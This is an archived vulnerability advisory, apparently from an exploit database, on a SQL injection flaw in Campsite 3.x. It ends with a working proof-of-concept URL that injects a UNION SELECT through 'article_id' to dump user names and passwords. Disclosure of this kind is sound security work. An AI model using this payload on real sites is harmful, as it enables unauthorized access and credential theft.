Campsite 3.x - 'article_id' SQL Injection

Author: Stefan Esser
type: webapps
platform: php
port: 
date_added: 2010-04-30  
date_updated: 2014-06-29  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 33915.txt  
source: https://www.securityfocus.com/bid/39862/info

Campsite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Campsite versions 3.2 through 3.3.5 are vulnerable; other versions may also be affected.

http://www.example.com/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x